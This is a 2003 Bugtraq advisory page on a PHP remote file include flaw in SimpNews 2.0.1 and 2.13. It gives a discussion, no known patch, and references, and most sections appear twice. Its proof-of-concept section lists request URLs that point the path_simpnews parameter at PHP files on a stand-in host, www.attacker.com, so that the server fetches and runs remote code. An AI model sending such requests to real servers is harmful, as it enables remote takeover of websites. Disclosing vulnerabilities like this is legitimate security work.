SimpNews PATH_SIMPNEWS Remote File Include Vulnerability
BID:8227
Info
SimpNews PATH_SIMPNEWS Remote File Include Vulnerability
| Bugtraq ID: | 8227 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 18 2003 12:00AM |
| Updated: | Jul 18 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to PUPET <[email protected]>. |
| Vulnerable: |
Bosch SimpNews 2.13 Bosch SimpNews 2.0.1 |
| Not Vulnerable: | |
Discussion
SimpNews PATH_SIMPNEWS Remote File Include Vulnerability
SimpNews is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a Simpnews URI variable. This variable is used in the include path for several SimpNews configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed.
SimpNews is prone to a vulnerability that may permit remote attackers to include and execute malicious PHP scripts. Remote users, under some PHP configurations, may influence a Simpnews URI variable. This variable is used in the include path for several SimpNews configuration scripts. By influencing the include path so that it points to a malicious PHP script on a remote system, it is possible to cause arbitrary PHP code to be executed.
Exploit / POC
SimpNews PATH_SIMPNEWS Remote File Include Vulnerability
The following examples have been provided:
http://www.example.com/eventcal2.php.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php
http://www.attacker.com/includes/has_entries.inc
or
http://www.example.com/eventscroller.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php
The following examples have been provided:
http://www.example.com/eventcal2.php.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php
http://www.attacker.com/includes/has_entries.inc
or
http://www.example.com/eventscroller.php?path_simpnews=
with
http://www.attacker.com/config.php
http://www.attacker.com/functions.php
Solution / Fix
SimpNews PATH_SIMPNEWS Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
SimpNews PATH_SIMPNEWS Remote File Include Vulnerability
References:
References:
- PUPET-simpnews.txt (Packetstorm)
- SimpNews Homepage (Bosch)